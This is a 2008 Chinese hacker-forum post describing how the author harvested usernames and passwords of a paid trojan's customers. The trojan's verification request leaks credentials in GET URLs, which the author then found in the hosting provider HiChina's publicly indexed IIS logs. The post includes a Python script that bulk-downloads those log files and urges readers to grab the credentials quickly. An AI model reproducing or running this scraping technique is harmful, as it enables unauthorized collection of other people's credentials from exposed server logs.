万网虚拟机漏洞,拿某VIP木马所有会员

  • 来源: 华夏黑客联盟 作者: lixiangjing   2008-07-02/13:09
  • 昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

    想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

    上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

    经验教训,这次拿到了绝对不能公布。

    这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

    所以会发送用户名密码出去。

    监听本地通讯,得到地址:http://xxx/ip/20071125xxxx.asp?user=kxlzx&pass=kanhenmekan!&version=1.0

    如果验证成功,返回一个EXE文件。

    可以得到信息:

    1,HTTP协议

    2,GET方式提交数据

    GET数据也就是说,IIS会把日志记录下来,日志里会有密码。。。

    类似于:

    20080126-00:47:40 66.249.xxx 200 http://xxx/ip/20071125xxxx.asp user=kxlzx&pass=kanhenmekan!&version=1.0
    20080126-00:54:02 66.249.xxx 500 http://xxx/check.asp |-|ASP_0113|脚本超时 181578

    当然之前并不知道居然能拿到日志。

    获取了验证文件地址后,在google搜索该木马域名,居然搜到了万网的日志记录。。。。无语。。。

    注意记录的格式:

    20080218-00:41:05 124.132xxx 200 http://www.xxx ...... 218.19xxx 200 http://www.xxx/ip/20071026Psxxx.asp user=jeffrey8273&pass=fedoracore...
    cn-22.hichina.com/asplog/log20080218.txt - 38k - 网页快照 - 类似网页

    20080220-00:37:26 194.110xxx 200 http://www.xxx...... http://www.xxx/ip/20071026xx.asp user=kalaam&pass=ne
    |-|ASP_0113|脚本超时107125 ...
    cn-22.hichina.com/asplog/log20080220.txt - 38k - 网页快照 - 类似网页

    这里:cn-22.hichina.com/asplog/log20080220.txt

    cn-22.hichina.com是万网的服务器,log20080220.txt 是日志地址。

    明明验证的服务器不再万网,这个日志为什么记录了vip木马的用户呢?

    推测是这样的,该VIP用户验证服务器曾经放在万网,被记录下来了。而万网有着良好的保存日志习惯。

    既然里面有VIP用户,就不客气了,python写了个脚本,抓他们。

    import urllib
    month=1
    while(month<7):
    day=0
    while(day<32):
    tmp = ''+str(month)+str(day)
    if (len(tmp)==2):
    tmp = str(month)+tmp
    strtmp = 'http://cn-22.hichina.com/asplog/log20070&#39;+tmp+&#39;.txt&#39;
    sock = urllib.urlopen(strtmp)
    htmlSource = sock.read()
    sock.close()
    strpath = 'log20080'+tmp+'.txt'
    f = file(strpath, 'w')
    f.write(htmlSource)
    f.close()
    day=day+1

    print tmp
    month = month+1
    #p#分页标题#e#

    PS: 抓到后,按照原来的文件名保存下来。其实也可以用迅雷抓,为什么要用python呢?

    -_-!这不刚学了python,显摆么。。。。

    抓下来的文件,拿editplus搜索该域名,得到了N多用户名密码。就不抓图了,免得某些人转载的时候说咱写的东西图太多。。。

    运气好的哥们儿速度抓撒,能拿到了也别传啊。。。(作者:空虚浪子…)


    评论 {{userinfo.comments}}

    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    驱动号 更多